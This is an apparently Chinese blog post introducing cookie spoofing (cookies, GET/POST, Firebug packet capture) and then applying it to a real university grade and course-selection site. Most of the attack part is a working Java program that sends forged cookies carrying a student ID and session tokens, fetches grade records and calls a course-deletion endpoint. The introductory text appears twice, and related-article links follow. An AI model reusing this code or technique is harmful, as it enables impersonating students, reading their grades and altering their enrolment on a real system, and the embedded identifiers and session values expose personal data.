cookie欺骗初探

最新推荐文章于 2024-01-22 22:43:21 发布
最新推荐文章于 2024-01-22 22:43:21 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: safe 文章标签: firebug 浏览器 服务器 exception url import


先普及一下基础知识
cookie欺骗      :就是利用cookie来欺骗,攻击过程中对于cookie的利用在于,cookie注入和cookie欺骗。
其它方法          :其他比较常用的还有xss,sql注入,旁注,什么的,这些先不提,多说一下这个跨站攻击其实叫做css,cross-site啥的,不过css这个简称已经被占用了,所以只能叫做xss了。
        cookie是个啥  :cookie的作用主要在于,把用户的一些信息存在本地,来让浏览器提供更加制定化的服务。
重要的是不要用cookie来存储重要的数据,比如学号什么的,这样非常不安全,或者使用cookie加session共同验证地方法。
Post与Get方法:服务器通过get与post方法来接收浏览器提交的数据,get的参数附带在url后面,字符过滤不严格易产生sql注入漏洞,post参数在表单里。
在服务器这样读取,Request.QueryString(GET)  Request.Form(POST)  如果直接这样写Resquest("ID")服务器会先检查GET在检查POST和cookie
抓包工具           :这次用一个叫做firebug的工具,是火狐的一个插件,有抓包功能,功能不错。安装过程可以在这找到http://jingyan.baidu.com/article/e9fb46e1b4ac3e7521f766c0.html
http请求结构 :一个http请求分为三部分 Method-URL-Protocol, Request Header,Entity body 具体看这里http://wenku.baidu.com/view/ec1a90bdf121dd36a32d8245.html
关于post请求头的具体含义:http://www.2cto.com/kf/201109/103338.html
 
执行cookie欺骗时,我们需要构造自己的请求信息头,其中包含篡改过的cookie,发送给浏览器。
 

前一阵子在研究有关cookie欺骗的东西,今日得大神学长指点,找了一个练手的网站。

先普及一下基础知识

cookie欺骗      :就是利用cookie来欺骗,攻击过程中对于cookie的利用在于,cookie注入和cookie欺骗。

其它方法          :其他比较常用的还有xss,sql注入,旁注,什么的,这些先不提,多说一下这个跨站攻击其实叫做css,cross-site啥的,不过css这个简称已经被占用了,所以只能叫做xss了。

        cookie是个啥  :cookie的作用主要在于,把用户的一些信息存在本地,来让浏览器提供更加制定化的服务。

重要的是不要用cookie来存储重要的数据,比如学号什么的,这样非常不安全,或者使用cookie加session共同验证地方法。

Post与Get方法:服务器通过get与post方法来接收浏览器提交的数据,get的参数附带在url后面,字符过滤不严格易产生sql注入漏洞,post参数在表单里。

在服务器这样读取,Request.QueryString(GET)  Request.Form(POST)  如果直接这样写Resquest("ID")服务器会先检查GET在检查POST和cookie

抓包工具           :这次用一个叫做firebug的工具,是火狐的一个插件,有抓包功能,功能不错。安装过程可以在这找到http://jingyan.baidu.com/article/e9fb46e1b4ac3e7521f766c0.html

http请求结构 :一个http请求分为三部分 Method-URL-Protocol, Request Header,Entity body 具体看这里http://wenku.baidu.com/view/ec1a90bdf121dd36a32d8245.html

关于post请求头的具体含义:http://www.2cto.com/kf/201109/103338.html
 

执行cookie欺骗时,我们需要构造自己的请求信息头,其中包含篡改过的cookie,发送给浏览器。

 

言归正传,我们拿成绩查询这个版块试一下,点击查询成绩

\

firebug捕捉到的post请求如下,注意看Cookie中有UserID这一项,只需要修改它,其它不用管。

\

 
 
最后用java来实现一下我们的想法
[java] view plaincopy
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.URL;
import java.net.URLConnection;
 
 
public class PostCookie {
    private static void SetConn(URLConnection connection){
        connection.setRequestProperty("accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
        connection.setRequestProperty("Accept-Encoding","gzip, deflate");
        connection.setRequestProperty("Accept-Language","zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3");
        connection.setRequestProperty("Connection","keep-alive");
        connection.setRequestProperty("Cookie","HitXueQi=2012%B4%BA%BC%BE; UserXueZhi=4; UserClass=1037102; UserType=studentLogin; UserZYBH=371; UserID=1103710215; ASPSESSIONIDQQRCTQSA=BKFPAMLDBIPKENPMPIGKGAKC; UserClass2=%2D; UserName=%CD%F5%D2%E2%C1%D6");
        connection.setRequestProperty("Host","xscj.hit.edu.cn");
        connection.setRequestProperty("Referer","http://xscj.hit.edu.cn/hitjwgl/xs/cjcx/cx.asp");
        connection.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0");        
        connection.setDoOutput(true);
        connection.setDoInput(true);
    }
    private static void GetExame(){
        try{
            URL url = new URL("http://xscj.hit.edu.cn/hitjwgl/xs/cjcx/cx_1.asp");
            URLConnection connection = url.openConnection();
            SetConn(connection);
            OutputStreamWriter out  = new OutputStreamWriter(connection.getOutputStream(),"8859_1");
            out.write("selectXQ=all&LB=1&Submit=%B2%E9%D1%AF%B3%C9%BC%A8");
            out.flush();
            out.close();
            InputStreamReader in = new InputStreamReader(connection.getInputStream());
            BufferedReader br = new BufferedReader(in);
            while (br.ready())
                System.out.println(br.readLine());
        }catch(Exception e){
            System.out.println(e.getMessage());
            System.out.print(e.getStackTrace());
        }
    }
    private static void Select(String url){
        try{
            URL jurl = new URL(url);
            URLConnection connection = jurl.openConnection();
            connection.setRequestProperty("accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
            connection.setRequestProperty("Accept-Encoding","gzip, deflate");
            connection.setRequestProperty("Accept-Language","zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3");
            connection.setRequestProperty("Connection","keep-alive");
            connection.setRequestProperty("Cookie","HitXueQi=2012%B4%BA%BC%BE; UserXueZhi=4; UserClass=1037102; UserZYBH=371; UserID=1103710215; ASPSESSIONIDQQRCTQSA=BKFPAMLDBIPKENPMPIGKGAKC; UserClass2=%2D; UserName=%CD%F5%D2%E2%C1%D6; ASPSESSIONIDSQSASQSB=IMDFBDMDCGPGGPPPDGOMJLJN; ASPSESSIONIDSQSCRSSA=JHBNBKMDCAAGHBNHBONFNOCA; AdminType=; AdminPart=; AdminLevel=; AdminID=; xkjssj=2012%2D4%2D29; XKXQ=2012%C7%EF%BC%BE; ASPSESSIONIDSQSBQSSB=DJJDDBNDMLDIPFFLLOFHEGOE; UserType=studentLogin; ASPSESSIONIDQQSDQSTA=BEIOCINDPCBCFMMNCGNOOGEA");
            connection.setRequestProperty("Host","xscj.hit.edu.cn");
            connection.setRequestProperty("Referer","http://xscj.hit.edu.cn/hitjwgl/xs/cjcx/cx.asp");
            connection.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0");        
            connection.setDoOutput(true);
            connection.setDoInput(true);
            InputStreamReader in = new InputStreamReader(connection.getInputStream());
            BufferedReader br = new BufferedReader(in);
            //while (br.ready())
                //System.out.println(br.readLine());
        }catch(Exception e){
            System.out.println(e.getMessage());
            System.out.print(e.getStackTrace());
        }
    }
    public static void main(String args[]){
        //Select("http:// www.2cto.com /hitjwgl/xs/kcxx/XK_XX_save.asp?xh=0447:0/559&YXFlag=1&XXYXZZYGX=0&isZZY=0&kch=/7W966/7%3C4&jsbm=8%3C==%3C88&xkid=54%3C=8&xf=2");
        //Select("http://xscj.hit.edu.cn/hitjwgl/xs/kcxx/XK_XX_1.asp?xssj=1&&isZZY=0&YXFlag=1&XXYXZZYGX=0");
        Select("http://xscj.hit.edu.cn/hitjwgl/xs/kcxx/XK_XX_del.asp?YXFlag=1&isZZY=0&XXYXZZYGX=0&xh=0447:0/559&kch=/7W966/7%3C4&xkid=54%3C=8");
        Select("http://xscj.hit.edu.cn/hitjwgl/xs/kcxx/XK_XX_1.asp?isZZY=0&YXFlag=1&XXYXZZYGX=0");
    }
}

pairsfish
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cookie欺骗
FreeXploiT
10-25 2040
现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9 和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 COOKIE欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通 讯协议无影响,所以要进行cookie欺骗可以有多种途径: 1、跳过浏览器,直接对通讯数据改写 2、修改
“黑客”入门学习之“Cookie技术详解”
Y525698136的博客
06-10 1900
今天就以本篇文章详细给大家介绍一下Cookie是什么?Cookie基本原理与实现?Cookie到底存在哪些安全隐患,我们该如何防御,有没有其他技术替代方案?
cookie欺骗
paradise3011的博客
09-18 8274
cookie欺骗是用户在登录的时候极为容易被他人获取权限,植入浏览器中,从而访问到后台。 先简要认识一下cookiecookie机制是在浏览网页的时候,服务器将你的登录信息,浏览信息等发送给客户端并保存一定的时间。当你下一次访问这个网站的时候,就能读取上一次你的记录。 例如自动登录等。很多的网站都是由cookie来辨认登录者的信息。它可以起到登录验证的作用,从而存在了漏洞,可以绕过验证直接登录...
安全 ctf-Web基础_cookie欺骗
最新发布
weixin_63274653的博客
01-22 863
1. 打开题目给的链接,显示:hello guest. only admin can get flag.document.cookie = 'admin = 1' #将admin的值修改为1。document.cookie #查看cookieCookie欺骗、认证、伪造。3. 然后按F5刷新界面,获得flag。
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
桂林老兵cookie欺骗
07-02
【桂林老兵cookie欺骗】是一种网络安全测试技术,主要针对网站的cookie管理机制进行模拟攻击测试,以评估网站的安全性。在互联网应用中,cookie服务器发送到用户浏览器并存储的一小块数据,用于维持用户会话状态、...
桂林老兵cookie欺骗工具
10-11
桂林老兵Cookie欺骗工具是一款在IT安全领域中被广泛讨论的工具,主要用于网络安全研究和测试。这个工具因其在Cookie管理及欺骗技术方面的应用而知名,尤其对于理解Web安全和防御策略的专家来说,它是一个重要的学习...
cookie 修改欺骗必备工具
12-29
在网络安全领域,Cookie修改欺骗是一种常见的技术,常用于测试网站的安全性、理解用户跟踪机制以及进行恶意攻击。本文将深入探讨Cookie的相关知识,包括其原理、作用,以及如何使用修改工具进行欺骗操作。 Cookie是...
Cookie欺骗工具
08-06
Cookie 欺骗 工具
cookie欺骗详解与防御技术
02-16
基于cookies的攻击与防御技术,讲述cookies攻击原理,攻击案例,以及防御技术
cookie欺骗教程
龙的天空
12-04 1205
   唉,很早就想点关于COOKIE的东东了,主要是网上有不少文章说半天其实也没有多少实质的东西。   首先大家明白什么是COOKIE,具体点说如果是98那么它们默认存放在C:/windows/cookies目录下,如果是2k它们在C:/Documents and Settings/%你的用户名%/Cookies目录下(每个文件都不会超过4KB)   它们的文件名格式为:你的用户名@产
cookies原理详解
xingzheouc的专栏
10-07 2167
(一)从使用者角度: Cookie在英文中是小甜品的意思,而这个词我们总能在浏览器中看到,食品怎么会跟浏览器扯上关系呢?在你浏览以前登陆过的网站时可能会在网页中出现:你好XX,感觉很亲切,就好像是吃了一个小甜品一样。这其实是通过访问你主机里边的一个文件来实现的,因此这个文件也就被称为了Cookie。想全面了解Cookie吗?看看下文吧!    一.了解Cookie 适用对象:初级读者
Cookie欺骗原理
zbyufei的测试专栏
03-03 1269
Cookie欺骗原理 正如我们所知道的,在网络词汇中,cookie是一个特殊的信息,虽然只是服务器存于用户计算机上的一个文本文件,但由于其内容的不寻常性(与服务器有一定的互交性,且常会存储用户名,甚至口令,或是其它一些敏感信息,例如在江湖或是一些社区中,常会用cookie来保存用户集分,等级等等)。因而成为一些高手关注的对象,借此来取得特殊权限,甚至攻克整个网站。以下是自己在xp,2003上
火狐插件火狐黑客插件将Firefox变成黑客工具的七个插件
热门推荐
xysoul的专栏
04-14 1万+
目前很多插件不支持 Firefox 3.5 哦 1. Add N Edit Cookies 查看和修改本地的CookieCookie欺骗必备。  下载:http://code.google.com/p/editcookie/downloads/list 2. User Agent Switcher 修改浏览器的User Agent,可以用来XSS。  下载:https:/
cookie欺骗(bugku)
weixin_46396711的博客
04-28 1229
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
Cookie 欺骗——漏洞
战神/calmness的博客
09-30 1516
目录 描述 影响 过程 修复建议 通达OA2016网络智能办公系统 描述 通达OA作为中国协同办公(OA)软件普及型的旗舰产品,功能涵盖人圆通讯、行政办公、知识管理、工作流程管理、HR、CRM、BI、ERP等8大领域,共有工作流、电子邮件、任务管理、日程安排、工作日志、公告通知、新闻、车辆管理、会议管理、办公用品管理、公文档案管理、项目管理、文件柜管理等300多个功能组件。在移动办公领域与钉钉形成全面战略合作,助您打造高效的沟通和管理平台 影响 V11版,2017版,2...
BugKu -- cookies欺骗
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
什么是cookie欺骗
05-20
Cookie欺骗是一种网络攻击,攻击者通过伪造或篡改网站的Cookie欺骗用户和服务器,从而获取非法的访问权限。Cookie是一种网站用于存储用户信息的小文件,其中包含了用户的身份验证信息、会话信息等。攻击者可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值